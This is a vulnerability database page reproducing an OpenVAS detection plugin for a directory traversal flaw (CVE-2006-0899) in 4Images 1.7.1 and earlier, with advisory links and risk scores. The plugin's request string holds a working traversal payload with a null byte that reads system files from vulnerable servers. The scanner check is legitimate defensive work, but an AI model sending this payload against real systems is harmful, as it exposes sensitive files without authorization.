4Images <= 1.7.1 Directory Traversal Vulnerability
🗓️ 26 Mar 2006 00:00:00Reported by Copyright (C) 2006 Ferdy RiphagenType
openvas🔗 plugins.openvas.org👁 27 Views
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| 4Images <= 1.7.1 index.php template Parameter Traversal Local File Inclusion | 6 Mar 200600:00 | – | nessus | |
| CVE-2006-0899 | 27 Feb 200619:00 | – | cve | |
| CVE-2006-0899 | 27 Feb 200619:00 | – | cvelist | |
| 4Images 1.7.1 - Local File Inclusion / Remote Code Execution | 26 Feb 200600:00 | – | exploitdb | |
| CVE-2006-0899 | 27 Feb 200619:06 | – | nvd | |
| Directory traversal | 27 Feb 200619:06 | – | prion |
| Source | Link |
|---|---|
| 4homepages | www.4homepages.de/forum/index.php |
| securityfocus | www.securityfocus.com/bid/16855 |
| secunia | www.secunia.com/advisories/19026/ |
# SPDX-FileCopyrightText: 2006 Ferdy Riphagen
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
# Original advisory / discovered by :
# http://retrogod.altervista.org/4images_171_incl_xpl.html
CPE = "cpe:/a:4homepages:4images";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.21020");
script_version("2025-04-15T05:54:49+0000");
script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
script_tag(name:"creation_date", value:"2006-03-26 17:55:15 +0200 (Sun, 26 Mar 2006)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2006-0899");
script_name("4Images <= 1.7.1 Directory Traversal Vulnerability");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2006 Ferdy Riphagen");
script_dependencies("gb_4images_detect.nasl", "os_detection.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("4images/installed");
script_xref(name:"URL", value:"http://www.4homepages.de/forum/index.php?topic=11855.0");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/16855");
script_xref(name:"URL", value:"http://secunia.com/advisories/19026/");
script_tag(name:"solution", value:"Sanitize the 'index.php' file.");
script_tag(name:"summary", value:"The remote web server is running 4Images which is prone to
directory traversal attacks.");
script_tag(name:"insight", value:"The installed application does not validate user-input passed
in the 'template' variable of the 'index.php' file.");
script_tag(name:"impact", value:"This allows an attacker to execute directory traversal attacks
and display the content of sensitive files on the system and possibly to execute
arbitrary PHP code if he can write to local files through some other means.");
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"Workaround");
exit(0);
}
include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
include("os_func.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );
if( dir == "/" ) dir = "";
files = traversal_files();
foreach file( keys( files ) ) {
url = dir + "/index.php?template=../../../../../../../../" + files[file] + "%00";
if( http_vuln_check( port:port, url:url, pattern:file ) ) {
report = http_report_vuln_url( port:port, url:url );
security_message( port:port, data:report );
exit( 0 );
}
}
exit( 99 );
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 27.5
EPSS0.09984